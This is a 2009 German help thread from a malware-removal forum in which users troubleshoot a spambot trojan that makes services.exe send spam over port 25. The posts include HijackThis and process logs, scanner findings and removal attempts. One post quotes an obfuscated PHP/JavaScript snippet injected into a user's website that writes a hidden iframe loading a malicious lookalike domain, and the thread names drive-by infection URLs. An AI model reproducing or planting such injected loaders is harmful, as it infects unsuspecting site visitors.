Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Spam-Versand durch services.exe (https://www.trojaner-board.de/74808-spam-versand-services-exe.html)

thief1064 04.07.2009 16:00
Spam-Versand durch services.exe
 
Hallo,

ich habe mir gestern wohl etwas eingefangen:

Gestern beim surfen durchs Internet (mit FF 3.5) kam ich auf eine Seite

VORSICHT! BESSER NICHT KLICKEN!
Code:
http://www.dennisvoigt.de
Auf dieser Seite geht es wohl um deutsche Städtenamen in den USA. Ich klickte auf eine Stadt (ich glaub es war Bamberg, bin mir aber nicht sicher) und öffnete auf dieser Seite einen Link zur Homepage von Bamberg in den USA.

Dann erschlug AntiVir mich mit Virenmeldungen. Welche genau weiß ich nicht mehr. Auf C:\ fanden sich 3 oder 4 neue Dateien, die offenbar automatisch im Hintergrund heruntergeladen wurden. Jedenfalls hatte danach ein paar Prozesse mehr im Taskmanager. Nachdem ich alle beendet hatte und die Meldungen von AntiVir mit "Löschen" bestätigte fühlte ich mich wieder sicher. Vorsichtshalber machte ich einen Virencheck. Keine außergewöhnlichen Funde (nur das übliche: Cookies).

Seit dem ist mein Internet ungewöhnlich langsam. Heute habe ich rausgefunden warum:

Der Systemprozess services.exe verschickt scheinbar spam.

Mit NetLimiter Monitor und netstat -a in der Konsole fand ich heraus, dass der Prozess sich zu verschiednen Rechner aber immer auf Port 25 (SMTP, Postausgangsserver) verbindet.

Ich habe bereits alles mögliche versucht um das Problem zu beheben (Virenscann mit verschiedenen Virenscannern, Hosts-Datei angeguckt, verdächtige Dateien gelöscht, Systemstart + Registrierungsdatenbank durchforstet, etc). Ich konnte leider noch keine Ursache finden.

Auch habe ich hier im Forum einen Thread mit den scheinbar gleichen Problem gefunden (allerdings von 2007 und ohne Lösung):
http://www.trojaner-board.de/42877-s...ickt-spam.html

Hier mein Hijackthis-Log:

Code:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 16:08:20, on 04.07.2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16850)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Programme\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\Programme\Google\Update\GoogleUpdate.exe
C:\Programme\NetLimiter 2 Monitor\nlsvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\NetLimiter 2 Monitor\NLClient.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\Java\jre6\bin\jusched.exe
C:\Programme\Gemeinsame Dateien\Logitech\G-series Software\LGDCore.exe
C:\WINDOWS\system32\ctfmon.exe
C:\programme\steam\steam.exe
C:\Programme\Pidgin\pidgin.exe
C:\Programme\Logitech\SetPoint\SetPoint.exe
C:\Programme\No-IP\DUC20.exe
C:\Code\Visual Basic\Visual Basic 6\Projekte\LED-Blinker\LED.exe
C:\Programme\Gemeinsame Dateien\Logishrd\KHAL2\KHALMNPR.EXE
C:\Programme\iTunes\iTunes.exe
C:\Programme\Mozilla Firefox 3.5\firefox.exe
C:\Programme\Java\jre6\bin\java.exe
C:\Downloads\HiJackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = h**p://www.google.de/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = h**p://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = h**p://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = h**p://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = h**p://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Idea2 SidebarBrowserMonitor Class - {45AD732C-2CE2-4666-B366-B2214AD57A49} - C:\Programme\Desktop Sidebar\sbhelp.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre6\bin\ssv.dll
O2 - BHO: Mario Forever Toolbar Helper - {8036D4D7-AAD3-4793-AB49-329E437155A8} - C:\Programme\Mario Forever Toolbar\v2.0.0.3\Mario_Forever_Toolbar.dll
O2 - BHO: IE Developer Toolbar BHO - {CC7E636D-39AA-49b6-B511-65413DA137A1} - C:\Programme\Microsoft\Internet Explorer Developer Toolbar\IEDevToolbar.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Programme\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Mario Forever Toolbar - {463DF6D5-BEC1-4d67-B217-59DB692DFC53} - C:\Programme\Mario Forever Toolbar\v2.0.0.3\Mario_Forever_Toolbar.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programme\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [Launch LGDCore] "C:\Programme\Gemeinsame Dateien\Logitech\G-series Software\LGDCore.exe" /SHOWHIDE
O4 - HKLM\..\Run: [Launch LCDMon] "C:\Programme\Gemeinsame Dateien\Logitech\LCD Manager\lcdmon.exe"
O4 - HKLM\..\Run: [Tweak UI 1.33 deutsch] RUNDLL32.EXE TWEAKUI.CPL,TweakMeUp
O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [avgnt] "C:\Programme\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Steam] "c:\programme\steam\steam.exe" -silent
O4 - HKCU\..\Run: [Pidgin] C:\Programme\Pidgin\pidgin.exe
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: LED.lnk = C:\Code\Visual Basic\Visual Basic 6\Projekte\LED-Blinker\LED.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Programme\Logitech\SetPoint\SetPoint.exe
O4 - Global Startup: No-IP.lnk = C:\Programme\No-IP\DUC20.exe
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Read with DeskBot - C:\Programme\DeskBot\DeskBot.htm
O9 - Extra button: Subscribe in Desktop Sidebar - {09FE188B-6E85-479e-9411-51FB2220DF80} - C:\Programme\Desktop Sidebar\sbhelp.dll
O9 - Extra 'Tools' menuitem: Subscribe in Desktop Sidebar - {09FE188B-6E85-479e-9411-51FB2220DF80} - C:\Programme\Desktop Sidebar\sbhelp.dll
O9 - Extra button: IE Developer Toolbar - {48FFE35F-36D9-44bd-A6CC-1D34414EAC0D} - C:\Programme\Microsoft\Internet Explorer Developer Toolbar\IEDevToolbar.dll
O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O10 - Unknown file in Winsock LSP: c:\windows\system32\nwprovau.dll
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - h**p://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.1.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - h**p://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{C92CA073-80CA-4A96-9D82-758D05E57DE2}: NameServer = 192.168.0.1
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~2\GOEC62~1.DLL
O23 - Service: Avira AntiVir Personal - Free Antivirus Planer (AntiVirScheduler) - Avira GmbH - C:\Programme\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: Avira AntiVir Personal - Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Programme\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Intelligenter Hintergrundübertragungsdienst (BITS) - Unknown owner - C:\WINDOWS\
O23 - Service: NetLimiter (nlsvc) - Locktime Software - C:\Programme\NetLimiter 2 Monitor\nlsvc.exe
O23 - Service: Automatische Updates (wuauserv) - Unknown owner - C:\WINDOWS\

--
End of file - 6087 bytes
Zudem habe ich noch eine Liste Prozesse inklusive der DLLs, die von services.exe geladen werden:

Code:
Process list saved on 16:50:05, on 04.07.2009
Platform: Windows XP SP2 (WinNT 5.01.2600)

[pid]        [full path to filename]                [file version]        [company name]
740        C:\WINDOWS\System32\smss.exe                5.1.2600.2180        Microsoft Corporation
820        C:\WINDOWS\system32\winlogon.exe                5.1.2600.2180        Microsoft Corporation
868        C:\WINDOWS\system32\services.exe                5.1.2600.3520        Microsoft Corporation
880        C:\WINDOWS\system32\lsass.exe                5.1.2600.2180        Microsoft Corporation
1048        C:\WINDOWS\system32\svchost.exe                5.1.2600.2180        Microsoft Corporation
1296        C:\WINDOWS\System32\svchost.exe                5.1.2600.2180        Microsoft Corporation
1808        C:\WINDOWS\system32\spoolsv.exe                5.1.2600.2696        Microsoft Corporation
1848        C:\Programme\Avira\AntiVir PersonalEdition Classic\sched.exe                8.0.0.17        Avira GmbH
636        C:\Programme\Avira\AntiVir PersonalEdition Classic\avguard.exe                8.0.1.30        Avira GmbH
1244        C:\Programme\NetLimiter 2 Monitor\nlsvc.exe                1.0.14.1        Locktime Software
3684        C:\WINDOWS\system32\svchost.exe                5.1.2600.2180        Microsoft Corporation
3848        C:\WINDOWS\Explorer.EXE                6.0.2900.3156        Microsoft Corporation
2572        C:\Programme\NetLimiter 2 Monitor\NLClient.exe                1.0.14.1        Locktime Software
1756        C:\WINDOWS\system32\svchost.exe                5.1.2600.2180        Microsoft Corporation
1144        C:\Programme\Java\jre6\bin\jusched.exe                6.0.110.3        Sun Microsystems, Inc.
2160        C:\Programme\Gemeinsame Dateien\Logitech\G-series Software\LGDCore.exe                1.3.166.0        Logitech Inc.
1664        C:\WINDOWS\system32\ctfmon.exe                5.1.2600.2180        Microsoft Corporation
3404        C:\programme\steam\steam.exe                1.0.0.0        Valve Corporation
508        C:\Programme\Pidgin\pidgin.exe                2.5.8.0        The Pidgin developer community
3284        C:\Programme\Logitech\SetPoint\SetPoint.exe                4.60.122.0        Logitech, Inc.
4072        C:\Programme\No-IP\DUC20.exe                2.2.1.0        Vitalwerks LLC
3144        C:\Code\Visual Basic\Visual Basic 6\Projekte\LED-Blinker\LED.exe                1.0.0.0        n/a
3728        C:\Programme\Gemeinsame Dateien\Logishrd\KHAL2\KHALMNPR.EXE                4.60.42.0        Logitech, Inc.
3408        C:\Programme\iTunes\iTunes.exe                8.0.2.20        Apple Inc.
2592        C:\Programme\Mozilla Firefox 3.5\firefox.exe                1.9.1.3462        Mozilla Corporation
3796        C:\Programme\Java\jre6\bin\java.exe                6.0.110.3        Sun Microsystems, Inc.
3208        C:\WINDOWS\system32\NOTEPAD.EXE                5.1.2600.2180        Microsoft Corporation
2612        C:\Downloads\HiJackThis.exe                2.0.0.2        Trend Micro Inc.


DLLs loaded by process C:\WINDOWS\system32\services.exe:

[full path to filename]                [file version]        [company name]
C:\WINDOWS\system32\ntdll.dll                5.1.2600.3520        Microsoft Corporation
C:\WINDOWS\system32\kernel32.dll                5.1.2600.3541        Microsoft Corporation
C:\WINDOWS\system32\ADVAPI32.dll                5.1.2600.3520        Microsoft Corporation
C:\WINDOWS\system32\RPCRT4.dll                5.1.2600.3555        Microsoft Corporation
C:\WINDOWS\system32\Secur32.dll                5.1.2600.3518        Microsoft Corporation
C:\WINDOWS\system32\msvcrt.dll                7.0.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\NCObjAPI.DLL                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\MSVCP60.dll                6.2.3104.0        Microsoft Corporation
C:\WINDOWS\system32\SCESRV.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\USER32.dll                5.1.2600.3099        Microsoft Corporation
C:\WINDOWS\system32\GDI32.dll                5.1.2600.3466        Microsoft Corporation
C:\WINDOWS\system32\USERENV.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\AUTHZ.dll                5.1.2600.2622        Microsoft Corporation
C:\WINDOWS\system32\umpnpmgr.dll                5.1.2600.2744        Microsoft Corporation
C:\WINDOWS\system32\WINSTA.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\NETAPI32.dll                5.1.2600.3462        Microsoft Corporation
C:\WINDOWS\system32\ShimEng.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\AppPatch\AcGenral.DLL                5.1.2600.2523        Microsoft Corporation
C:\WINDOWS\system32\WINMM.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\ole32.dll                5.1.2600.2726        Microsoft Corporation
C:\WINDOWS\system32\OLEAUT32.dll                5.1.2600.3266        Microsoft Corporation
C:\WINDOWS\system32\MSACM32.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\VERSION.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\SHELL32.dll                6.0.2900.3402        Microsoft Corporation
C:\WINDOWS\system32\SHLWAPI.dll                6.0.2900.3429        Microsoft Corporation
C:\WINDOWS\system32\UxTheme.dll                6.0.2900.2845        Microsoft Corporation
C:\WINDOWS\system32\IMM32.DLL                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\LPK.DLL                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\USP10.dll                1.420.2600.2180        Microsoft Corporation
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03\comctl32.dll                6.0.2900.2982        Microsoft Corporation
C:\WINDOWS\system32\comctl32.dll                5.82.2900.2982        Microsoft Corporation
C:\WINDOWS\system32\Apphelp.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\eventlog.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\WS2_32.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\WS2HELP.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\PSAPI.DLL                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\wtsapi32.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\IMAGEHLP.DLL                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\cryptdll.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\dnsapi.dll                5.1.2600.3394        Microsoft Corporation
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.3352_x-ww_81af8e88\gdiplus.dll                5.1.3102.3352        Microsoft Corporation
C:\WINDOWS\system32\NTMARTA.DLL                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\WLDAP32.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\SAMLIB.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\System32\mswsock.dll                5.1.2600.3394        Microsoft Corporation
C:\WINDOWS\System32\winrnr.dll                5.1.2600.2180        Microsoft Corporation
C:\Programme\Bonjour\mdnsNSP.dll                1.0.5.11        Apple Inc.
C:\WINDOWS\system32\Iphlpapi.dll                5.1.2600.2912        Microsoft Corporation
C:\WINDOWS\system32\rasadhlp.dll                5.1.2600.2938        Microsoft Corporation
C:\WINDOWS\system32\rsaenh.dll                5.1.2600.2161        Microsoft Corporation
C:\WINDOWS\system32\hnetcfg.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\System32\wshtcpip.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\msv1_0.dll                5.1.2600.2180        Microsoft Corporation
C:\WINDOWS\system32\ESENT.dll                5.1.2600.2780        Microsoft Corporation
Hier noch ein Screenshot von NetLimiter Monitor:

http://web484.nextlogin.de/_images/n...ter_port25.PNG

Ich hoffe jemand weiß rat.

Danke schon mal im Voraus.


UPDATE:

So wie es aussieht handelt es sich um folgenden Trojaner:
Trojan.Win32.Agent.dwg

Jedenfalls hat(te) jemand das gleiche Problem -> http://forum.geizhals.at/t549200,4610963.html#4610963
Allerdings möchte ich nur sehr ungern mein System neuaufsetzen.

HansWurst2k8 06.07.2009 20:37
Hallo,

bekannter von mir hat seit 3 tagen genau das selbe problem aber er war definitiv nicht auf dieser dennisvoigt seite.

diverse viren und malware scanner finden nix auf dem rechner und ich habe sogar alle möglichen prozesse gekillt aber die original microsoft services.exe baut permanent smtp verbindungen auf und verschickt sicherlich reichlich spam.

krieg ich den rechner wieder sauber ohne alles neu zu installieren?


update:

bin schon ein stück weiter hab jetzt ein scanner der was gefunden hat

dr.web cureit identifiziert datei 62cc46e7.sys im verzeichnis c:\windows\system32\drivers als Trojan.Spambot.4527

hier das virustotal ergebnis
http://www.virustotal.com/de/analisi...141-1246911052

löschen der datei scheint nix zu bringen die is nach kurzer zeit wieder da.



greetz

thief1064 07.07.2009 15:13
!
 
Hallo,

also ich habe das Problem kurzfristig gelöst, in dem ich die Systemwiederherstellung von Windows XP genutzt habe.
Aber kurze Zeit später trat das Problem wieder auf.

Es gibt eine möglichkeit den Spamversand kurzfristig zu verhindern:

Mit einem Tool, dessen Name mir leider nicht mehr einfällt, konnte ich den Systemprozess services.exe beenden. Kurz nach dem beenden des Prozesses will Windows innerhalb einer Minute automatisch herunterfahren. Dies kann man mit dem Befehl "shutdown -a" in der Konsole abbrechen.
Nachteil der Sache ist, dass einige Programme gar nicht mehr starten (z.b. Firefox), einige sich beim Starten aufhängen und allgemein vorallem Internetanwendungen nicht mehr richtig funktionieren.

Nach einem Neustart sieht alles aber wie vorher aus.

Ich habe festgestellt, dass scheinbar eine Sicherheitslücke in Firefox 3.5 ausgenutzt wird, da ich eine Seite gefunden habe, die den scheinbar gleichen Virus verbreitet:

VORSICHT! WIEDER NICHT KLICKEN!!!
Code:
http://microsotf.cn
Ich habe diese Seite mit dem Firefox Browser geöffent und bekam direkt wieder zig Virenmeldung von AntiVir (die gleichen wie zuvor auch). Es spielte sich das exakt gleiche Szenario wie zuvor ab.
Die Folge war, dass ich schnell neugestartet habe und anschließend eine Systemwiederherstellung gemacht habe. Leider ohne nennenswerten Erfolg.
Der Spamversand ging weiter.

In Opera passiert rein gar nix, wenn ich die oben genannte Seite öffne.

So sah der Code aus, den ich entdeckte:

PHP-Code:
<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e
s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\"
wid"+''+'th=1
he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';
?>

Noch etwas:

Ich habe diese Internetaddresse (s.o.) zufällig als Iframe in einer meiner Webseiten entdeckt. Da der Code garantiert nicht von mir ist, bin ich skeptisch geworden und habe den Link einfach mal aus neugier geöffnet. Ein großer Fehler wie sich herausgestellt ...
Der Virus verbreitet sich scheinbar auch per FTP, da ich mir nicht anders erklären kann wie der Code sonst da rein gekommen ist. Wer weiß wie er sich noch verbreitet.
Ich vermute, dass der Betreiber der Seite von Dennis Voigt ein ähnliches Problem mit dieser geframten Seite hat / hatte und ich mir den Virus so eingefangen habe.

Ich habe jetzt mein System jetzt wieder neu aufgesetzt, da ich keine Lösung gefunden habe.

Ich habe bestimmt 5 Anti-Virenprogramme ausprobiert, aber keins hat den Virus erkannt.

Wenn ich Neuigkeiten habe, melde ich mich wieder.

HansWurst2k8 07.07.2009 16:29
also ich denke mal ich habs beim bekannten wieder sauber bekommen nachdem cureit durch war hab ich nochmal asquared free laufen lassen.

im system32\drivers verzeichnis waren noch zwei andere sys dateien mit datum vom anfang diesen monats auf eine von beiden ist virustotal.com nicht angesprungen bei der anderen waren auch einige treffer. nachdem ich die auch gelöscht hatte und den rechner neu gestartet habe war der spamversand vorbei.

ich werde weiter beobachten ...

aber wenn das wirklich so einfach durch den firefox 3.5 eingeschleußt werden kann wär schon krass


greetz


Alle Zeitangaben in WEZ +1. Es ist jetzt 19:42 Uhr.

Copyright ©2000-2024, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129